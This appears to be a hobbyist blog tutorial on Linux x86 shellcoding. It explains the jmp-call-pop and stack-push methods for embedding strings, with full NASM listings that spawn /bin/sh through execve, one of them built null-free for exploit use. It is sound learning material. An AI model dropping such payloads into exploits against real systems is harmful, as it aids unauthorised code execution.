Hi!

I decided to spend some time on Linux shellcoding this weekend and this was amazing! Last time I had similar experience on my Assembly Classes at the University, but it was a long time ago, it was about DOS and it wasn’t about shellcoding or security itself. So, I considered that this is the best time to have some fun and get new skills.

Ok, what does the word “Shellcode” mean?

In two words, this is a some piece of code that will perform necessary actions on attacked system after successful exploitation of some vulnerability. Usually, the word “Shellcode” is applicable only for binary exploitation (Buffer Overflows, Heap-based attacks, etc.). In other cases, it is just a “Payload”.

This is important to note, that shellcode is a byte sequence that contains instructions that will be executed by hardware (CPU, especially) on the target system.

There is no sections from usual executables like ELF or PE where we can store data. For example, you always can find .data or .bss sections in ELF binaries where some variables are stored. But if so, how can we store, for example, IP Address and Port for reverse TCP shell in our shellcode?

Well, I found two possible solutions.

1. EIP-based approach

You definitely know about CALL instruction that saves an address of the next instruction into the stack and changes program execution flow. It is similar with JMP (and other) which, actually, doesn’t save anything into the stack.

What if we place our data right after this instruction? In this case, address of our data will be pushed into the Stack and we will be able to place it into any register with a POP instruction.

global _start

section .text

_start:
    jmp MESSAGE      

PAYLOAD:

    ...

    pop ecx             ; Message Address

    ...
                      
MESSAGE:
    call PAYLOAD       	; String Address will be pushed in the Stack
			; As Saved-EIP value
    db "Hello, World!", 0dh, 0ah


section .data

This is a part of my ‘Hello, World!’ shellcode that uses this way to work with data.

How you can see, MESSAGE part of this code contains CALL instruction and string that we need to use in PAYLOAD section. In my case, ECX have to store address of the string to be printed with SYS_WRITE call. And single POP instruction allows us to load this address into ECX.

Ok, let’s look at the next example now. I have written a shellcode that runs command shell for us using this technique.

Here is the code:

global _start

section .text

_start:
    jmp DATA      

PAYLOAD: 
    pop ebx		; Place address of "/bin/sh" to EBX
    xor ecx, ecx 	; All other params for SYS_EXECVE 
    xor eax, eax        ; equal 0
    xor edx, edx        ;
    xor esi, esi        ;

    mov al, 0x0b 	; SYS_EXECVE CODE
    int 0x80       
DATA:
    call PAYLOAD       
    db "/bin/sh", 0h	

section .data

In this case, string “/bin/sh” should have “\x00” byte at the end, this is a requirement of SYS_EXECVE syscall. This code works fine and creates command shell for us. But what if we want to use it as a part of our exploit? Ending of “/bin/sh” will create additional bad char for us, because “\x00” byte is forbidden for the most of applications.

What should we do in this case? Well, we can implement custom or use public-available crypter to avoid bad characters. I didn’t like this way, because I just couldn’t implement my custom crypter and I wanted to do the things by my own hands.

Or we can find another way to store data in our shellcode!

2. Stack-based approach

Stack is awesome! You should know that if you read this article :D We can push here any data we want to be pushed. And ESP will always point to the top of the Stack. But how can we use it in order to pass data in our shellcode?

Ok, let’s check string “/bin/sh”, 0h again. First of all, any string is just a sequence of bytes. We can split this byte array into some amount of parts where will be only 4 bytes in each part. And we can push these parts into the Stack one by one - in this case, we will have a whole string in the Stack and ESP will be pointing on the beginning of this string! The main thing to note here is that x86 implements little-endian architecture, so, we should push reversed values to the Stack.

What about “\x00”? Well, we can push this byte into the Stack with billion of possible ways. For example, we can run ‘xor eax, eax’ and ‘push eax’.

global _start

section .text

_start:
    xor eax, eax
    push eax		; NULL-Terminator for "/bin/sh"

   			; Place "/bin/sh" string splitted by two parts
			; in little-endian form to the Stack:
    push 0x68732f2f	; push "hs//" - extra / to avoid \x00
    push 0x6e69622f	; push "nib/"
   
    mov ebx, esp	; EBX points to the "/bin/sh" string 
 
    xor ecx, ecx 	; Set 0 all other params
    xor edx, edx        ; for SYS_EXECVE
    xor esi, esi

    mov al, 0x0b 	; SYS_EXECVE CODE
    int 0x80       

section .data

This code doesn’t contain “\x00” byte, but “\x00” byte is included in our “/bin/sh” string that actually is “/bin//sh”, 0h, because of padding (push instruction takes 5 bytes and 4 of them are for argument - if we will use single “/”, we get additional “\x00” in our shellcode). So, SYS_EXECVE will work and we will get our shell.

Conclusion

Both of techniques works fine in some conditions. First way doesn’t require Stack (useful in environments with limited stack space), you can just specify the whole string without splitting and the little-endian magic. Second way can give you necessary flexibility, but only at the cost of readability. Also, in other cases, you may be faces with necessity of advanced padding of your strings - you can’t solve all troubles with an extra “/”.

Good Luck!

The end